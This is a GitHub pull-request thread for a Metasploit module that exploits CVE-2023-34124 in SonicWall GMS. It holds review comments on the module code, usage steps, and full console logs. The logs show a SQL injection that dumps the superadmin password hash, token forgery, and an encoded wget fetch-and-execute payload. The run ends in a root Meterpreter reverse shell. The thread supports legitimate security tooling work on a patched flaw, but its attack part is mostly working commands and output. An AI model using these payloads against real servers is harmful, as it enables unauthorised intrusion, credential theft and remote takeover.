Sonicwall rce CVE-2023-34124 #18302
Conversation
Thanks for having a look, @jvoisin! I think I've addressed everything you suggested! |
Has anyone come up with any checker/mass scanner for this?
Thanks @rbowes-r7 for this great module! I left a few minor comments and suggestions before it lands. I tested version 9.3.9320 and it works great on both Linux and Windows. Thank you for helping me with the software installation.
```ruby
# If there's no ':' in the response, something super weird happened
fail_with(Failure::UnexpectedReply, 'SQL injection returned the wrong value: no username or hash') if !hash.include?(':')

username, hash = hash.split(/:/, 2)
```
I don't think regex is needed here. A simple character will avoid unnecessary regex processing.
```diff
-username, hash = hash.split(/:/, 2)
+username, hash = hash.split(':', 2)
```
```ruby
when :cmd
  my_payload = payload.encoded
when :dropper
  my_payload = generate_payload_exe(code: payload.encoded)
```
It looks like `payload.encoded` is the default payload in `generate_payload_exe`.

metasploit-framework/lib/msf/core/exploit/exe.rb, lines 65 to 66 in 28ba19a:

```ruby
pl = opts[:code]
pl ||= payload.encoded
```

```diff
-my_payload = generate_payload_exe(code: payload.encoded)
+my_payload = generate_payload_exe
```

```ruby
'==== | uudecode;',

# Run in the background with coproc
"coproc #{Shellwords.escape(payload_file)};",
```
I was surprised this works for both ELF and shell script, since `execute_command_linux` can receive an executable as raw binary or a shell script. If a shell script is received, the resulting temporary file created on the target will be a text file containing the command without a shebang line. Since it is chmod'ed as executable, the parent shell seems to guess it is a shell script and execute it with /bin/sh. That's cool!
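The behaviour the reviewer describes (an executable text file with no `#!` line is still run as a script by the invoking shell, via the ENOEXEC fallback) can be checked locally with a harmless file. This is an added example, not code from the module or the PR; the script body and the helper names are constructed for the demonstration.

```shell
# Create a constructed script with no shebang at all and print its path.
make_no_shebang_script() {
  tmp=$(mktemp) || return 1
  printf 'echo from-script\n' > "$tmp"
  chmod +x "$tmp"
  printf '%s' "$tmp"
}

# Return 0 only if the file starts with '#!'; used to prove there is none.
has_shebang() {
  head -c 2 "$1" | grep -q '^#!'
}

# Invoke the file by path, as the module does with its temp file. The kernel
# refuses it (ENOEXEC, no shebang and not ELF), so the shell re-runs it with
# /bin/sh and the script still executes.
run_file() {
  "$1"
}
```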
Yup! Super handy, thanks Linux!
I could maybe do "bash " to be safe, but /shrug
```ruby
'PAYLOAD' => 'cmd/unix/generic',
'DisablePayloadHandler' => true
```
I'm wondering if there is any reason to disable the payload handler?

On my test environment (Linux VM Appliance with SonicWall GMS 9.3.9320), `wget` is available, which let me use a fetch payload:

```
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set payload payload/cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set DisablePayloadHandler false
DisablePayloadHandler => false
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit rhosts=192.168.100.43 lhost=192.168.100.19 verbose=true fetch_srvhost=192.168.100.19 fetch_command=WGET
[*] Command to run on remote host: wget -qO ./QhmRCknzxk http://192.168.100.19:8080/aWXHuJn0-w7Npfyk2zEaeQ; chmod +x ./QhmRCknzxk; ./QhmRCknzxk &
[*] Fetch Handler listening on 192.168.100.19:8080
[*] HTTP server started
[*] Adding resource /aWXHuJn0-w7Npfyk2zEaeQ
[*] Started reverse TCP handler on 192.168.100.19:4444
[*] Attempting to use SQL injection to grab the password hash for the superadmin user...
[*] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
[*] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
[*] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
[*] Grabbing server hashing token...
[*] Got the server-side token: 92398446593864970646036091413420
[*] Generated client token: 611e94991eef3d3bb5e586070836a7a8
[*] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Linux detected!)
[*] Encoding (Linux) payload
[*] Encoded shell command: bash -c PLUS\=\$\(echo\ -e\ begin-base64\ 755\ a\\\\nKwee\\\\n\=\=\=\=\ \|\ uudecode\ -o-\)\;echo\ -e\ begin-base64\ 755\ /tmp/.wlwfbnum\\\\nd2dldCAtc8gLi9RaG1S2tuenhrIGhdHA6Ly8xOIuMTY4LjEMTk6ODA4MC9hV1pFYWVROyBaG1vZCAreCAus7IC4vUWhtUkNbnpm\\\\n\=\=\=\=\ \|\ uudecode\;coproc\ /tmp/.wlwfbnum\;rm\ /tmp/.wlwfbnum
[*] Attempting to execute the shell injection payload
[*] Client 192.168.100.43 requested /aWXHuJn0-w7Npfyk2zEaeQ
[*] Sending payload to 192.168.100.43 (Wget/1.21.3)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.100.43
[+] Payload sent!
[*] Meterpreter session 7 opened (192.168.100.19:4444 -> 192.168.100.43:55231) at 2023-08-31 11:30:00 +0200

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : gms.example.com
OS           : (Linux 3.18.44-snwl-VMWare-x64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > [*] Shutting down Meterpreter...
```
```
[*] Attempting to execute the shell injection payload
[+] Payload sent!
[*] Exploit completed, but no session was created.
```

What could be the reason for this?
There could be a lot of reasons for this. This can be an AV running on the target that blocks the payload execution, the software is patched and not vulnerable anymore, the payload simply needs some local tool to run properly (e.g. `wget`, `curl`, etc.), the handler is not running on the Metasploit side, a firewall is blocking somewhere, etc.

Please, can you give more details?
Hi, thank you for answering. What details are needed, so I can give them?

I run the exploit and give it the LHOST and RHOST. It works fine until the end, which gives no session.
```
[*] Command to run on remote host: wget -qO ./SfaBnzTq http://192.168.100.120:8080/_Ysce7IWY9BXUC2Go0wjXg; chmod +x ./SfaBnzTq; ./SfaBnzTq &
[*] Fetch Handler listening on 192.168.100.120:8080
[*] HTTP server started
[*] Adding resource /_Ysce7IWY9BXUC2Go0wjXg
[*] Started reverse TCP handler on 192.168.100.120:4444
[*] Attempting to use SQL injection to grab the password hash for the superadmin user...
[*] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
[*] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
[*] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:4e91d12e61259fed5d485f38e71da4be
[*] Grabbing server hashing token...
[*] Got the server-side token: 08178100102648407989985416008201
[*] Generated client token: 5f33490baf0bed3a8c3061e3b879e334
[*] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Linux detected!)
[*] Encoding (Linux) payload
[*] Encoded shell command: bash -c PLUS=$(echo\ -e\ begin-base64\ 755\ a\\nKwee\\n====\ |\ uudecode\ -o-);echo\ -e\ begin-base64\ 755\ /tmp/.lcsqpuat\\nd2dldCAtcU8gLi9TZmFCbnpUcSBodHRwOi8vMTkyLjE2OC4xMDAuMTIwOjgwODAvX1lzY2U3SVdZOUJYVUMyR28wd2pYZzsgY2htb2QgK3ggLi9TZmFCbnpUcTsgLi9TZmFCbnpUcSAm\\n====\ |\ uudecode\ ;\ coproc\ /tmp/.lcsqpuat\ ;\ rm\ /tmp/.lcsqpuat
[*] Attempting to execute the shell injection payload
[+] Payload sent!
[*] Exploit completed, but no session was created.
```
Re: the original thing, I figured `generic/command` wouldn't necessarily want a handler. I don't feel strongly, though, so I went ahead and removed that.
Thanks @rbowes-r7! Everything looks good to me now. I tested against version 9.3.9320 on Linux and Windows and verified I got a session. I'll go ahead and land it.

Release Notes: This adds an exploit module that leverages a remote code execution in SonicWall GMS. Version 9.3.9320 (and likely earlier) is affected by this vulnerability identified as CVE-2023-34124.
Add a module for a remote code execution issue in SonicWall GMS. This works by exploiting several different issues fixed in the same patch, culminating in shell injection. One of the biggest difficulties was getting past their XSS filter, which takes exception to a lot of special characters. Both the Windows and Linux versions should be able to encode/run any command that's not too long.

Verification

The affected software is SonicWall GMS 9.3.9320 (and likely earlier). The first patched version is 9.3.9330. They should be available in the "vulnerable software" folder, but need to be linked to a (free) SonicWall account + demo license. I documented how to get those going in the `documentation/` entry. This should work against both the Windows version (which is a .exe installer) and a Linux version (which is a VM appliance, which, AFAICT, they don't give you a login for, or at least not one I could find).

Once the software is installed:

- `msfconsole`
- `use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124`
- Set `TARGET`, `RHOST`, `LHOST`, and possibly `FETCH_SRVHOST` (for Windows)
- `run`

Happy to help with running the software or testing the modules!